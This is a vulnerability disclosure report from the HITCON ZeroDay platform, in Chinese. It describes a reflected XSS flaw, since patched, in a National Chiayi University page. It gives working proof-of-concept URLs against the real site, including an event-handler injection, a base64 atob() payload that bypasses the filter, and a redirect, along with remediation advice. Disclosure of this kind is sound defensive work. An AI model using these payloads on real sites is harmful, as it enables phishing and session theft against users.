Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00622
- Vendor: 國立嘉義大學
- Title: 嘉義大學 XSS 漏洞
- Introduction: show_Map_Class.aspx 頁面的 year 參數未經過適當編碼即反射至 HTML 屬性中,攻擊者可注入惡意事件處理器執行任意 JavaScript,對使用者造成危害。
處理狀態
目前狀態
公開
Last Update : 2026/06/06
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2026/05/02 20:57:27 : 新提交 (由 vic88 更新此狀態)
- 2026/05/02 23:35:54 : 新提交 (由 vic88 更新此狀態)
- 2026/05/05 00:23:49 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:38:59 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:38:59 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/27 15:39:00 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/29 11:39:21 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/06/06 03:00:18 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00622
- 通報者:vic88 (vic88)
- 風險:中
- 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)
參考資料
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113&DeptNo=345
敘述
漏洞說明
guides.ncyu.edu.tw的 show_Map_Class.aspx 頁面中,year GET 參數的值未經過適當的 HTML 編碼處理,即直接被反射至回應頁面的 HTML
屬性值中,導致攻擊者可透過特製 URL 注入任意 HTML 事件處理器,若使用者滑過或點擊,即可觸發跨站腳本攻擊。
重現步驟
PoC 1(onmouseover 觸發 alert)
https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113%22%20onmouseover%3d%22alert(1)%22&DeptNo=345
*URL decode 後的 payload 為:year=113" onmouseover="alert(1)"
服務端將 year 的值反射進連結屬性,形成:
<a href="show_Map_Class.aspx?year=113" onmouseover="alert(1)"&DeptNo=345...">
滑鼠滑過即可觸發alert(1)
PoC 2 DOM 操作(base64 繞過過濾)
直接傳入 document.body.innerHTML 會被伺服器端重新導向首頁,
但透過 atob() 對 payload 進行 base64 編碼可繞過此限制:
https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113%22%20onmouseover%3d%22document.body.innerHTML%3datob(%27PGgxPkhhY2tlZCBieSBYU1M8L2gxPg%3D%3D%27)%3B%20return%20false%3B%22&DeptNo=345
base64 decode後的 payload 為:
<h1>Hacked by XSS</h1>
觸發後整個頁面的 body 內容會被替換。
PoC 3 跳轉至其他網域
https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113%22%20onmouseover%3d%22window.location%3d%27https%3A%2F%2Fexample.com%27%22&DeptNo=345
URL decode後的 payload 為:
year=113" onmouseover="window.location='https://example.com'"
一樣只需滑鼠經過即可觸發跳轉
相關原始碼片段
伺服器回傳的 HTML 中,year 被直接嵌入連結屬性,未經正確處理:
<a href="show_Map_Class.aspx?year=113" onmouseover="alert(1)"&DeptNo=345&SecNo=&CP_ID1=88#id88">
精準農業科研人才
</a>
以及頁面底部按鈕:
<a href="show_Map_DeptList.aspx?year=113" onmouseover="alert(1)"&DeptNo=345&cID=&pID="">
更多相關職業
</a>
影響
- 攻擊者可透過社交工程散布惡意連結,誘騙使用者點擊
- 可竊取使用者 Cookie / Session(但本站目前無發現明顯使用者登入機制,Cookie 竊取實際危害有限)
- 可進行釣魚攻擊、頁面偽造
- 可重新導向使用者至惡意網站
影響範圍
- 受影響頁面:
show_Map_Class.aspx,經測試 DeptNo=345、346、347等多個系所頁面均受影響,推測全站系所頁面共用相同渲染邏輯
修補建議
1. **輸出編碼(Output Encoding)**:所有來自使用者輸入的參數,在反射至 HTML 屬性時,應使用 HTML 屬性編碼。
2. **輸入驗證(Input Validation)**:`year` 欄位應於伺服器端驗證為純整數格式(如正則 `^\d{3,4}$`),若不符合則拒絕請求或回傳錯誤頁面。
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。